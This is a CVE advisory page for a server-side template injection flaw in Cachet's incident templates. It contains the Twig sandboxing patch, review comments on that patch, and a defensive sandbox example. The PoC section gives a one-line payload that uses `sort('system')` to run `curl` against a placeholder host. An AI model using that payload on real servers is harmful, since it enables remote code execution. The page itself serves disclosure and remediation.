CVE-2023-43661: Merge pull request from GHSA-hv79-p62r-wg3p · cachethq/cachet@6fb043e
Cachet is an open-source status page system. Prior to the 2.4 branch, the template feature, which allows users to create incident templates, lets them execute arbitrary code on the server because the template input is not filtered and an old Twig version is used. Commit 6fb043e109d2a262ce3974e863c54e9e5f5e0587 of the 2.4 branch contains a patch for this issue.
Expand Up @@ -23,9 +23,12 @@ use CachetHQ\Cachet\Services\Dates\DateFactory; use Carbon\Carbon; use Illuminate\Contracts\Auth\Guard;
use Twig\Environment as Twig_Environment; use Twig\Loader\ArrayLoader as Twig_Loader_Array;
/** * This is the create incident command handler. * Expand All @@ -49,6 +52,8 @@ class CreateIncidentCommandHandler */ protected $dates;
protected $twigConfig;
/** * Create a new create incident command handler instance. * Expand All @@ -61,6 +66,8 @@ public function __construct(Guard $auth, DateFactory $dates) { $this->auth = $auth; $this->dates = $dates;
$this->twigConfig = config(“cachet.twig”); }
/** Expand Down Expand Up @@ -131,6 +138,34 @@ public function handle(CreateIncidentCommand $command) return $incident; }
protected function sandboxedTwigTemplateData(String $templateData) {
if (!$templateData) { return ""; }
$policy = new \Twig\Sandbox\SecurityPolicy($this->twigConfig[“tags”], $this->twigConfig[“filters”], $this->twigConfig[“methods”], $this->twigConfig[“props”], $this->twigConfig[“functions”]);
$sandbox = new \Twig\Extension\SandboxExtension($policy);
$templateBasicLoader = new Twig_Loader_Array([ ‘firstStageLoader’ => $templateData ]);
$sandBoxBasicLoader = new Twig_Loader_Array([ ‘secondStageLoader’ => ‘{% sandbox %}{% include “firstStageLoader” %} {% endsandbox %}’ ]);
$hardenedLoader = new \Twig\Loader\ChainLoader([$templateBasicLoader, $sandBoxBasicLoader]); $twig = new Twig_Environment($hardenedLoader); $twig->addExtension($sandbox); return $twig; }
/** * Compiles an incident template into an incident message. * Expand All @@ -141,8 +176,7 @@ public function handle(CreateIncidentCommand $command) */ protected function parseTemplate(IncidentTemplate $template, CreateIncidentCommand $command) { $env = new Twig_Environment(new Twig_Loader_Array([])); $template = $env->createTemplate($template->template); $template = $this->sandboxedTwigTemplateData($template->template);
$vars = array_merge($command->template_vars, [ ‘incident’ => [ Expand All @@ -157,7 +191,7 @@ protected function parseTemplate(IncidentTemplate $template, CreateIncidentComma ‘component_status’ => $command->component_status, ], ]);
return $template->render($vars); return $template->render('secondStageLoader’, $vars); } }
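Review bot: In the `@@ -49,6 +52,8 @@` hunk the new `protected $twigConfig;` property has no docblock, while the neighbouring properties in this class (`$dates` is visible just above it) are documented. Add one that states the type and origin of the value, e.g. `/** The Twig sandbox configuration (cachet.twig). @var array */`.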
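Review bot: In the `@@ -61,6 +66,8 @@` hunk the constructor reads `config("cachet.twig")` without checking the result. If that config file is absent or one of the five keys the policy later reads (`tags`, `filters`, `methods`, `props`, `functions`) is missing, the constructor succeeds and the failure surfaces only when `SecurityPolicy` is built inside `handle()`. Validate the five keys here and fail fast, and consider passing the config in through the constructor alongside `$dates` so the handler can be unit-tested with a known policy instead of global `config()`.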
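Review bot: In the `@@ -131,6 +138,34 @@` hunk `sandboxedTwigTemplateData()` returns `""` when `$templateData` is empty but a `Twig_Environment` on every other path; the caller in `parseTemplate()` then invokes `->render('secondStageLoader', $vars)` on a string, which is a fatal "call to a member function on string" rather than an empty incident message. Handle the empty case in the caller (return an empty message before calling this method) and declare a return type of `: Twig_Environment` so the mismatch cannot recur. Two smaller points in the same hunk: the parameter type `String` works only because PHP type names are case-insensitive, the idiomatic spelling is `string`; and the two `Twig_Loader_Array` instances joined by a `ChainLoader` can be a single `ArrayLoader` holding both `firstStageLoader` and `secondStageLoader`. Finally, the extension is registered without global sandboxing, so protection rests on the `{% sandbox %}{% include "firstStageLoader" %}{% endsandbox %}` wrapper and on the `cachet.twig` allowlists, which are not part of this diff; confirm that the `filters` list excludes filters that accept a callable argument, since the advisory's PoC relies on `sort('system')`.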
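Review bot: In the `@@ -141,8 +176,7 @@` hunk the line `$template = $this->sandboxedTwigTemplateData($template->template);` overwrites the `IncidentTemplate $template` parameter with a Twig environment, so the variable changes type halfway through the method and the following `$template->render(...)` reads as if a template object were being rendered. Keep the `$env` name the removed line used (`$env = $this->sandboxedTwigTemplateData($template->template);`) so the model and the environment stay distinct. The removal of `$env->createTemplate($template->template)` is the substantive fix here: the raw user template is no longer compiled outside the sandbox.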
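Review bot: In the `@@ -157,7 +191,7 @@` hunk `render('secondStageLoader', $vars)` hands the merged `$command->template_vars` and `incident` array straight into the sandboxed include. The sandbox's `methods` and `props` allowlists only constrain objects that reach the template through this context, so the change should note in the PR description (and the config should reflect) that those lists are expected to be empty or minimal; nothing in this diff shows what `template_vars` may contain.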
Related news
### Summary

The template feature, which lets users create incident templates, allows them to execute arbitrary code on the server because the template input is not filtered and an old Twig version is used. Within `/cachet/app/Http/Routes/ApiRoutes.php`, an attacker can control the `template` input, which is passed to Laravel's dispatched handler `/cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php`. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability, which can lead to remote code execution. This vulnerability does not exist within the [Twig](https://twig.symfony.com/) library itself; it exists because [Cachet](https://github.com/cachethq/cachet) processes the data without any filtration. This has been patched in Cachet version 2.4.

### PoC

1. Log in as a default user (non-admin);
2. Create an incident with name `slug1` and with content: `{{ ['curl yourhost.com','']|sort('system') }}` or with any other ...
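The mitigation the advisory points to is Twig's sandbox with an explicit allowlist, which is what the patch wires in through `cachet.twig`. The script below is an added example, not Cachet's code or anything from the commit: it renders a user-supplied incident template through the same two-stage `{% sandbox %}{% include %}` pattern, with a constructed allowlist (the real `cachet.twig` values are not on this page), and shows a benign template rendering while one that reaches for a non-allowlisted filter is refused. It also returns an empty message for an empty template instead of handing a string back where an environment is expected. It assumes `twig/twig` (2.x or 3.x) is installed via Composer; the function and template names are placeholders.

```php
<?php
// Added example (not Cachet's code): sandboxed rendering of a user-controlled
// incident template. Assumes twig/twig is installed and autoloadable.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;

// Constructed allowlist for this example; Cachet's real cachet.twig config is
// not shown on the page. 'escape' is listed because autoescaping inserts it.
// No filter that accepts a callable (sort, map, filter, reduce) is allowed.
$policy = new SecurityPolicy(
    ['if', 'for'],                 // tags
    ['escape', 'upper', 'date'],   // filters
    [],                            // methods callable on objects
    [],                            // properties readable on objects
    []                             // functions
);

/**
 * Render $userTemplate inside a Twig sandbox. The wrapper template is the only
 * thing compiled outside the sandbox, and it contains nothing user-controlled.
 */
function renderIncidentTemplate(string $userTemplate, array $vars, SecurityPolicy $policy): string
{
    // Empty template: return an empty message rather than a non-environment value.
    if ($userTemplate === '') {
        return '';
    }

    $loader = new ArrayLoader([
        'user_template' => $userTemplate,
        'wrapper'       => '{% sandbox %}{% include "user_template" %}{% endsandbox %}',
    ]);

    $twig = new Environment($loader, ['autoescape' => 'html']);
    // Not sandboxed globally; the {% sandbox %} tag enables it for the include.
    $twig->addExtension(new SandboxExtension($policy));

    return $twig->render('wrapper', $vars);
}

// Constructed sample variables, shaped like the incident context the handler builds.
$vars = ['incident' => ['name' => 'Database latency', 'status' => 'Investigating']];

// Benign template using only allowlisted filters: renders normally.
echo renderIncidentTemplate('{{ incident.name|upper }}: {{ incident.status }}', $vars, $policy), PHP_EOL;

// Template that uses a filter outside the allowlist: the policy rejects it at
// render time with a SecurityError, before any filter code runs.
try {
    renderIncidentTemplate('{{ incident|sort }}', $vars, $policy);
} catch (SecurityError $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}
```

Run it with `php example.php` after `composer require twig/twig`. The first call prints the rendered message; the second prints `blocked: Filter "sort" is not allowed.` (wording from Twig's `SecurityNotAllowedFilterError`). The allowlist is the whole control: anything added to `filters`, `functions`, `methods` or `props` widens what a template author can reach, so each entry should be justified against the variables actually passed in.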